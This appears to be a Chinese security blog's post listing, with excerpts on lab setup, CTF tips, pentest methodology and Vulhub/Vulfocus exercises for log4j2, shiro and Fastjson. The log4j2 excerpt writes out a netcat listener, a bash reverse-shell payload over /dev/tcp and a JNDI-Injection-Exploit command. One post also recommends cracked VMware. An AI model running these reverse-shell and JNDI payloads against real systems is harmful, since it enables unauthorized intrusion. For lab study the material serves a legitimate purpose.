- 博客(20)
- 收藏
- 关注
RSS订阅原创 【安全攻防知识-9】Fastjson(CNVD-2017-02833)验证
vulfocus-Fastjson(CNVD-2017-02833)验证
2022-06-29 15:54:46
772
1
原创 【安全攻防知识-6】Redis和Jboss攻击
1、Redis1.1 背景在内网渗透中,设置为空口令或者弱口令的Redis大量存在,以此为跳板,或许能有收获。Redis 是一个高性能的key-value数据库,Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务器可以是关联其他从服务器的主服务器。简而言之,Redis可以提供高效率的数据查询服务。1.2 漏洞利用思路Redis本身漏洞较少,它主要存在的漏洞还是未授权访问漏洞,总共有三种主流的提权方式,这里分别进行讲解。1.2.1 直接写getshell
2022-05-25 18:35:28
206
原创 【安全攻防知识-5】木马利用
1、木马类型本文仅介绍与渗透攻击密切相关的木马。1.1 远程控制型木马以让攻击者完全控制被入侵的主机,攻击者可以利用它完成一些甚至连主机主人本身都不能顺利进行的操作。该种类的木马往往集成了其他种类木马的功能,可以任意访问文件、获取目标主机用户的私人信息,包括信用卡、银行账号等至关重要的信息。1.2 密码发送木马密码发送木马是为专门盗取被感染主机上的密码而编写的,木马一旦被执行,就会自动搜索内存、 Cache、临时文件夹以及各种敏感密码文件,一旦搜索到有用的密码,木马就会利用免费的电子邮件
2022-05-17 15:18:00
901
原创 渗透攻击一般思路
以 https://mp.csdn.net/mp_blog/creation/editor为例0、获取资产(1)通过fofa(2)通过友情网站1、针对URL本身(1)看网站搭建,web指纹扫描--railgun--开源软件漏洞,log4j2、shiro、fastjson、weblogic--去github寻找扫描器,比如 shiro exp;(2)针对域名,用oneForAll去做子域名的解析、遍历;也可以用御剑做目录遍历--相关的url、大量的ip,可以通过Ehole.
2022-05-17 14:22:18
1351
原创 【安全攻防知识-4】CTF之MISC
1、MISC介绍MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、压缩包解密、流量分析取证、与信息安全相关的大数据等。竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。2、隐写术隐写术包括图片、音频、视频等文件隐写,在处理这类问题时,应优先确认该文件的实际类型,可参考下图,查看其文件头信息。常用以下工具:1、010editor查看文件类型2、Binwalk合并文件3、Notepad++进行
2022-03-24 15:52:02
35685
4
原创 【安全攻防知识-3】学习平台搭建汇总
DVWA:web靶场练习平台建议学习安全的同事熟练掌握DVWA所有漏洞。DVWA简介及搭建_Touchl的博客-CSDN博客_dvwaj另外,学习漏洞时,推荐在网上搜索 DVWA教程、DVWA通关等进行练习。Sqli-labs:SQL注入练习平台【SQL注入】windows下sqli-labs的搭建_spectre-CSDN博客_sqli搭建虽然现在有SqlMap这种工具,手动注入还是要有基本的了解。Vulhub:漏洞复现和练习平台本人之前的博客有搭建教程。.
2022-02-24 15:45:19
3702
原创 【安全攻防知识-2】虚拟机环境搭建
1、虚拟机软件选择Windows推荐使用VMware,建议使用破解版即可。Mac推荐使用VMware Fusion,或者Parallels Desktop,但是没有VMware好用。2、镜像下载建立自己的攻击机或者实验机器,推荐使用正版镜像Windows推荐msdn资源,上面还有一些其他的工具。MSDN, 我告诉你 - 做一个安静的工具站Linux做网络攻击需要有个Linux的系统,作为攻击机或者实验靶机。推荐使用安全攻击专用的Kali,里面集成了许多攻击工具
2022-02-24 15:26:47
4454
原创 【安全攻防知识-1】Linux基础
一、学习资源推荐个人推荐直接在菜鸟教程学习,相关命令可以在Kali尝试效果。Linux 教程 | 菜鸟教程二、linux目录结构Linux目录结构见下图,一般经常隐藏Flag的是:1、tmp2、etcroot三 、Linux攻击常用命令1、目录操作cd:进入其他目录,例如cd /rootls:浏览当前目录有哪些信息,一般用ls或者ls -lartpwd:查看当前自己在哪个目录mkdir:创建一个新的目录mkdir -p /bridy其余
2022-02-24 14:31:45
3328
原创 【安全攻防实验-5】Vulfocus练习-log4j2攻击
1、VPS打开监听nc -lvvp 4444#顺便写个payloadbash -i >& /dev/tcp/your-ip/8888 0>&12、payload转化java.lang.Runtime.exec() Payload Workarounds - @Jackson_T准备真正的payloadjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "上面的payload" -A
2022-02-08 17:23:12
1515
原创 【安全攻防实验-4】Vulfocus练习-log4j2攻击准备
1、环境准备2、工具准备2.1安装JNDI-Injection-Exploit git clone https://github.com/welk1n/JNDI-Injection-Exploit.git2.2 安装MVNmkdip -p /usr/local/apache-mavencd /usr/local/apache-mavenwget -c https://dlcdn.apache.org/maven/maven-3/3.8.4/bin...
2022-02-08 15:29:06
1216
原创 【安全攻防实验-3】Vulhub练习-shiro
1、打开测试环境cd /安装目录/vulmaster/shiro/CVE-2016-4437#查看测试说明more READ.md打开测试环境docker-compose up -d2、使用渗透工具练习使用shiro-tool获取了root权限3、关闭测试环境docker-compose down...
2022-02-08 09:54:48
947
原创 【安全攻防实验-1】Vulhub搭建
1、Vulhub介绍Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。2、Vulhub安装pip install docker-composewget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zipunzip vulhub-master.zip
2022-02-07 16:15:17
1758
原创 云服务器配置
1、打开ssh远程登录sudo vi /etc/ssh/sshd_config修改permitrootlogin yesservice ssh restart2、搭Apachesudo apt install apache2 -ysystemctl status apache23、
2021-12-07 21:32:39
188
原创 PHP反序列化学习笔记
PHP魔术方法整理方法名 作用 __construct 构造函数,在创建对象时候初始化对象,一般用于对变量赋初值 __destruct 析构函数,和构造函数相反,在对象不再被使用时(将所有该对象的引用设为null)或者程序退出时自动调用 __toString 当一个对象被当作一个字符串被调用,把类当作字符串使用时触发,返回值需要为字符串,例如echo打印出对象就会调用此方法 __wakeup() 使用unserialize时触发,反序列化恢复对象...
2020-11-13 15:45:23
188
原创 CTF内网渗透笔记
一、漏洞挖掘相关工具的使用NMAP扫描工具使用1.扫描指定的IP范围nmap 192.168.0.101-110 2.扫描指定的IP网段nmap 192.168.0.* --exclude 192.168.0.1003.扫描指定网址的操作系统类型(深度扫描)nmap -A 192.168.0.101ornmap -O 192.168.0.1014.扫描网络内活跃的主机(该命令会跳过端口扫描或检测)nmap -sP 192.168.0.*5.快速扫描主
2020-11-10 15:33:27
3893
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人